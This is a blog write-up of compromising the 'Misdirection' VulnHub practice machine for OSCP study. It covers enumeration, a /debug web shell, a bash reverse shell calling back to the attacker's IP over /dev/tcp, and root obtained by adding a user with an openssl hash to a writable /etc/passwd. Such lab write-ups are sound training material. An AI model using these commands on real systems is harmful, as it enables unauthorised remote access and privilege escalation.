Hacking MISDIRECTION- VulnHub

(OSCP similar practice machine)

Vulnhub Description

The purpose of this machine is to grant OSCP students further develop, strengthen, and practice their methodology for the exam.

So Let’s dive into pwning the machine and gain a root shell

______________________________________

Target I.P → 192.168.230.134 | Attacker’s I.P → 192.168.230.128

For the initials, let’s go for scanning and enumeration, I got the results as:

Hmm.. we got some standard ports. Both 80, 8080 has webpage up and running. So first i hop over to http://192.168.230.128:8080.

After that I brute force the web-directories to find some way in and results that showed up are:

After enumerating all of these, some interesting ones found are:

/debug , /wordpress

wordpress was hardcoded with I.P 192.168.1.61:8080. Either I update my /etc/host file or review it later(because I doubt due to the machine’s name ;-/)

So i jumped to http://192.168.230.134/debug. Looks like a shell, AWESOME!!!!

So i ran the command to get a reverse shell:

/bin/bash -c ‘/bin/bash>/dev/tcp/192.168.230.128/9999 0>&1 2>&1 &’

My box was listening to this port, and YES!! we got a shell. Checking for sudo permissions allowed and we got something very easily:

Okay, so without furthur ado as per results, I switched to bretix. This user is allowed to edit the /etc/passwd AWESOME!!!

Now we are going to create a user on the target machine with it’s entry is /etc/passwd file. Here we’ll be using openssl for salted hash

openssl passwd -1 -salt user3 pass123

Back to the target machine. Here we are going to use the hash that we generated in the previous step and make a user neelesh which has the elevated privilege. Now, all we got to do is run su command with the user name we just created and enter the password and root shell.

And we are root!!

That’s all for now,

Until Next Time,

I’m Neelesh, Thanks for the read…

— — — — — — — — — — — — — →

Ping me if you face any issues

Linkedin:- https://www.linkedin.com/in/user-neeleshpatel/

— — — — — — — — — — — — — →

--

--

--

Cybersecurity | CTFs | Networking |

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

MySQL Adventures: MetaBase Sync May Eat Your InnoDB Buffer Pool

Identify a specific procedure, service, or treatment provided by a physician.

Big O notation and time complexity part 6

Collection Types in Swift

Running with Monads

Getting started with Git Workflow

Let’s peep into Docker a bit !

Build ns-3 on Docker Ubuntu image on Windows 10/11

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Neelesh Patel

Neelesh Patel

Cybersecurity | CTFs | Networking |

More from Medium

Vulnhub Series →DC-1

Log4j Malware — Charming Kitten

Privilege Escalation in Linux Systems

My First CTF (PicoCTF) — Obedient Cat!